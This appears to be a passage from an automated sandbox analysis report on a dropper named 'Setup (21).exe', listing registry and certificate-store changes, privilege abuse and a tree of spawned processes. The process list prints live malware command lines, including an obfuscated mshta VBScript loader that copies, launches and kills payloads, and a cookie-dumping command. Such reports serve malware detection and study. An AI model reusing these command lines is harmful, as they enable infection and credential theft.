| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Windows\System32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache\7\52C64B7E | C:\Windows\System32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache | C:\Windows\System32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\sihclient.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | N/A | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\Instance\ | N/A | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{f8278c54-a712-415b-b593-b77a2be0dda9}\Instance\ | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | N/A | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\SystemCertificates\CA\Certificates\8D4C4A23BA9EE84EA7348FA98CC6E65FBB69DE7B | C:\Users\Admin\AppData\Local\Temp\is-552S6.tmp\Setup.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Script User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Setup (21).exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Setup (21).exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\4_hzqRqVs10KTU3sNHLWO1em.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\4_hzqRqVs10KTU3sNHLWO1em.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Documents\4_hzqRqVs10KTU3sNHLWO1em.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\57cA8QoO2k9yfbIsbLc4JUjp.exe | N/A |
Suspicious behavior: SetClipboardViewer
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\4402502.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\7948182.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Documents\kQgr_CBdsxJSCe_Rc3KMmnX2.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Documents\10AcJNkqNad6MaQczsUO18S0.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Documents\c5xOgFwDoAjjimlvH3cndBre.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Documents\dFccDEsRk7gTNKAD1oSb2EAT.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\3857461.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Documents\Oe88DJ3T4iLGbzGvVo7dJ4a5.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\7268927.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeCreateTokenPrivilege | N/A | C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe | N/A |
| Token: SeMachineAccountPrivilege | N/A | C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-FUI7P.tmp\9ybFKgN4WuGnce5JdPMQM3DS.tmp | N/A |
| N/A | N/A | C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-8P335.tmp\WEATHER Manager.tmp | N/A |
| N/A | N/A | C:\Program Files\Windows Defender\mpcmdrun.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-GH7T6.tmp\VPN.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-552S6.tmp\Setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-Q005E.tmp\tWm_pRDvAZZWNDIG3H_UEBf4.tmp | N/A |
| N/A | N/A | C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-6R48I.tmp\Setup.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Setup (21).exe
"C:\Users\Admin\AppData\Local\Temp\Setup (21).exe"
C:\Windows\System32\sihclient.exe
C:\Windows\System32\sihclient.exe /cv juDKImBLWkCHi9D6+osR0w.0.2
C:\Users\Admin\Documents\ZgAkNyvlSHVJ1bhgapZjpy5d.exe
"C:\Users\Admin\Documents\ZgAkNyvlSHVJ1bhgapZjpy5d.exe"
C:\Users\Admin\Documents\4_hzqRqVs10KTU3sNHLWO1em.exe
"C:\Users\Admin\Documents\4_hzqRqVs10KTU3sNHLWO1em.exe"
C:\Users\Admin\Documents\NQcQzWXtpEGKMyTl5AoE7i7S.exe
"C:\Users\Admin\Documents\NQcQzWXtpEGKMyTl5AoE7i7S.exe"
C:\Users\Admin\Documents\c5xOgFwDoAjjimlvH3cndBre.exe
"C:\Users\Admin\Documents\c5xOgFwDoAjjimlvH3cndBre.exe"
C:\Users\Admin\Documents\4IubBdzTDcB9wNt5L88OiOii.exe
"C:\Users\Admin\Documents\4IubBdzTDcB9wNt5L88OiOii.exe"
C:\Users\Admin\Documents\dFccDEsRk7gTNKAD1oSb2EAT.exe
"C:\Users\Admin\Documents\dFccDEsRk7gTNKAD1oSb2EAT.exe"
C:\Users\Admin\Documents\C5JNZApmPyOG7fYSdjZmyU5B.exe
"C:\Users\Admin\Documents\C5JNZApmPyOG7fYSdjZmyU5B.exe"
C:\Users\Admin\Documents\kQgr_CBdsxJSCe_Rc3KMmnX2.exe
"C:\Users\Admin\Documents\kQgr_CBdsxJSCe_Rc3KMmnX2.exe"
C:\Users\Admin\Documents\uIVM5UX3s2Mhr_WMWbjqOR4I.exe
"C:\Users\Admin\Documents\uIVM5UX3s2Mhr_WMWbjqOR4I.exe"
C:\Users\Admin\Documents\gXVQiH2WbjbW9J8M6og9_LRu.exe
"C:\Users\Admin\Documents\gXVQiH2WbjbW9J8M6og9_LRu.exe"
C:\Users\Admin\Documents\5nnPxINMdjkRH78PeclRzI0d.exe
"C:\Users\Admin\Documents\5nnPxINMdjkRH78PeclRzI0d.exe"
C:\Users\Admin\Documents\d1cSuepKgtvUWoz3bgL2bjmy.exe
"C:\Users\Admin\Documents\d1cSuepKgtvUWoz3bgL2bjmy.exe"
C:\Users\Admin\Documents\_aS69HCqYfasr2anZXWD9l51.exe
"C:\Users\Admin\Documents\_aS69HCqYfasr2anZXWD9l51.exe"
C:\Users\Admin\Documents\u_YM_sbCBf_xkidDex2YnJ9T.exe
"C:\Users\Admin\Documents\u_YM_sbCBf_xkidDex2YnJ9T.exe"
C:\Users\Admin\Documents\YtcGX4jqiLU53KrqLal5jS2e.exe
"C:\Users\Admin\Documents\YtcGX4jqiLU53KrqLal5jS2e.exe"
C:\Users\Admin\Documents\6SGgH6drewLSSJUPUj1P7jm0.exe
"C:\Users\Admin\Documents\6SGgH6drewLSSJUPUj1P7jm0.exe"
C:\Users\Admin\Documents\_SCmzGdU7N9jwGUMFYfs5jBb.exe
"C:\Users\Admin\Documents\_SCmzGdU7N9jwGUMFYfs5jBb.exe"
C:\Users\Admin\Documents\UifkURBfFsQbjvFeBdjqzVHl.exe
"C:\Users\Admin\Documents\UifkURBfFsQbjvFeBdjqzVHl.exe"
C:\Users\Admin\Documents\6rL3_fn_t8rgw1FDRsoDuuaz.exe
"C:\Users\Admin\Documents\6rL3_fn_t8rgw1FDRsoDuuaz.exe"
C:\Users\Admin\Documents\Eau0YHEujefu64_rj4_1bvaB.exe
"C:\Users\Admin\Documents\Eau0YHEujefu64_rj4_1bvaB.exe"
C:\Users\Admin\Documents\BZM2yXS9Qpj0LBwXhHUiqHRE.exe
"C:\Users\Admin\Documents\BZM2yXS9Qpj0LBwXhHUiqHRE.exe"
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
C:\Users\Admin\Documents\Oe88DJ3T4iLGbzGvVo7dJ4a5.exe
"C:\Users\Admin\Documents\Oe88DJ3T4iLGbzGvVo7dJ4a5.exe"
C:\Users\Admin\Documents\R9hzi1rG28yqaIQZUAUwxXPx.exe
"C:\Users\Admin\Documents\R9hzi1rG28yqaIQZUAUwxXPx.exe"
C:\Users\Admin\Documents\pAAqtr00joMYIGWMKHR4PyBW.exe
"C:\Users\Admin\Documents\pAAqtr00joMYIGWMKHR4PyBW.exe"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN("C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\Documents\4IubBdzTDcB9wNt5L88OiOii.exe"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF """" == """" for %A In (""C:\Users\Admin\Documents\4IubBdzTDcB9wNt5L88OiOii.exe"" ) do taskkill -f -iM ""%~NxA"" ",0 , TRUE) )
C:\Users\Admin\Documents\9ybFKgN4WuGnce5JdPMQM3DS.exe
"C:\Users\Admin\Documents\9ybFKgN4WuGnce5JdPMQM3DS.exe"
C:\Users\Admin\Documents\10AcJNkqNad6MaQczsUO18S0.exe
"C:\Users\Admin\Documents\10AcJNkqNad6MaQczsUO18S0.exe"
C:\Program Files (x86)\Company\NewProduct\jooyu.exe
"C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 4572 -ip 4572
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
C:\Program Files (x86)\Company\NewProduct\customer3.exe
"C:\Program Files (x86)\Company\NewProduct\customer3.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
C:\Users\Admin\AppData\Local\Temp\is-FUI7P.tmp\9ybFKgN4WuGnce5JdPMQM3DS.tmp
"C:\Users\Admin\AppData\Local\Temp\is-FUI7P.tmp\9ybFKgN4WuGnce5JdPMQM3DS.tmp" /SL5="$F0230,138429,56832,C:\Users\Admin\Documents\9ybFKgN4WuGnce5JdPMQM3DS.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4572 -s 320
C:\Users\Admin\Documents\5nnPxINMdjkRH78PeclRzI0d.exe
C:\Users\Admin\Documents\5nnPxINMdjkRH78PeclRzI0d.exe
C:\Users\Admin\Documents\BZM2yXS9Qpj0LBwXhHUiqHRE.exe
C:\Users\Admin\Documents\BZM2yXS9Qpj0LBwXhHUiqHRE.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\Documents\4IubBdzTDcB9wNt5L88OiOii.exe" hBS_VbW.EXE&&StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "" =="" for %A In ("C:\Users\Admin\Documents\4IubBdzTDcB9wNt5L88OiOii.exe" ) do taskkill -f -iM "%~NxA"
C:\Users\Admin\Documents\4_hzqRqVs10KTU3sNHLWO1em.exe
"C:\Users\Admin\Documents\4_hzqRqVs10KTU3sNHLWO1em.exe"
C:\Users\Admin\Documents\Pn1VVo1T_hse7zpU6N5O7Ppu.exe
"C:\Users\Admin\Documents\Pn1VVo1T_hse7zpU6N5O7Ppu.exe"
C:\Users\Admin\Documents\6rL3_fn_t8rgw1FDRsoDuuaz.exe
C:\Users\Admin\Documents\6rL3_fn_t8rgw1FDRsoDuuaz.exe
C:\Users\Admin\Documents\UifkURBfFsQbjvFeBdjqzVHl.exe
"C:\Users\Admin\Documents\UifkURBfFsQbjvFeBdjqzVHl.exe" -q
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 1188 -ip 1188
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 3952 -ip 3952
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 5012 -ip 5012
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 1052 -ip 1052
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3952 -s 296
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 3252 -ip 3252
C:\Users\Admin\Documents\6rL3_fn_t8rgw1FDRsoDuuaz.exe
C:\Users\Admin\Documents\6rL3_fn_t8rgw1FDRsoDuuaz.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 2736 -ip 2736
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1052 -s 296
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 708 -p 2236 -ip 2236
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1188 -s 280
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 728 -p 4056 -ip 4056
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5012 -s 316
C:\Users\Admin\AppData\Roaming\3857461.exe
"C:\Users\Admin\AppData\Roaming\3857461.exe"
C:\Users\Admin\Documents\c5xOgFwDoAjjimlvH3cndBre.exe
"C:\Users\Admin\Documents\c5xOgFwDoAjjimlvH3cndBre.exe"
C:\Users\Admin\AppData\Roaming\3639688.exe
"C:\Users\Admin\AppData\Roaming\3639688.exe"
C:\Users\Admin\AppData\Roaming\5594086.exe
"C:\Users\Admin\AppData\Roaming\5594086.exe"
